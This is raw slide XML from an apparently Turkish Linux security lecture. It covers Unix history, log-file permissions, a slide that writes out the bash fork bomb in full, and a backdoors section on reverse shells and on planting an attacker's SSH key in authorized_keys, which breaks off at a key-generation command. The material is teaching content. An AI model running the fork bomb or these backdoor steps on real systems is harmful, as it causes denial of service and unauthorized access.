              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Google Shape;586;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1880475"/>
            <a:ext cx="87309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700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>find /var/log -type f | xargs chmod 600</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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 name="Shape 71"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p13"/>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Kısa Tarihçe</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Google Shape;73;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4550875" y="666450"/>
            <a:ext cx="4476900" cy="3504300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ken Thompson ve Dennis Ritchie</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bell Labs'ta 1969 yılında </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> işletim sistemi</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C programlama dilini geliştirdi.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Andrew S. Tanenbaum öğrenim amaçlı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MINIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de geliştirdi.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linus Torvalds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MINIX'den</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> esinlenerek 1991 yılında Linux çekirdeğinin geliştirdi.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Google Shape;74;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="782600"/>
            <a:ext cx="4311025" cy="3430400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4831050"/>
            <a:ext cx="9144000" cy="37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Ken Thompson and Dennis Ritchie at PDP-11/20, Image by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>bell-labs.com </a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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90" name="Shape 590"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Google Shape;591;p76"/>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Fork bomb</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Google Shape;592;p7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a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;};</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="593" name="Google Shape;593;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439250" y="666450"/>
            <a:ext cx="4453796" cy="4105650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Google Shape;594;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4857100"/>
            <a:ext cx="6456300" cy="32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cite: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>devinart</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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1213"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="599" name="Shape 599"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Google Shape;600;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413625" y="2274500"/>
            <a:ext cx="4202400" cy="4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US" sz="3400"/>
              <a:t>Arka Kapılar</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="601" name="Google Shape;601;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="141850" y="1015863"/>
            <a:ext cx="4667663" cy="3111775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Google Shape;602;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4831050"/>
            <a:ext cx="9144000" cy="36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rgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by Dima Pechurin on Unsplash</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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7" name="Shape 607"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Google Shape;608;p78"/>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Image by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.wallarm.com</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="609" name="Google Shape;609;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="104675" y="1393250"/>
            <a:ext cx="4634976" cy="2459725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="EFEFEF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Google Shape;610;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="0"/>
            <a:ext cx="7848300" cy="513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b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor vs Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="611" name="Google Shape;611;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872951" y="1393238"/>
            <a:ext cx="4099548" cy="2459730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="EFEFEF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104675" y="748375"/>
            <a:ext cx="4635000" cy="4104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Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Google Shape;613;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872975" y="748363"/>
            <a:ext cx="4099500" cy="4104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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFF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17" name="Shape 617"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Google Shape;618;p7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Backdoor: ssh authorized_keys dosyası</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Google Shape;619;p79"/>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3"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Google Shape;620;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104950" y="677525"/>
            <a:ext cx="8817300" cy="40020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rgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="434343"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>authorized_keys dosyası, ~/.ssh/authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> konumunda bulunur ve yetkilendirilmiş kullanıcıların genel anahtarlarının bir listesini içerir.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Bu genel anahtarlar, belirli bireyleri temsil eder ve bu kişilere sunucunuzdaki belirli bir hesaba giriş yapma izni verilmiştir.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Saldırganlar, kendi genel anahtarlarını .ssh/authorized_keys dosyasına ekleyerek işletim sisteminde arka kapı oluşturabilir.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Böylece SSH aracılığıyla sisteme erişim sağlar.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ ssh-keygen -a 50 -t ed25519 -f backdoor_ssh -q -N “”</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
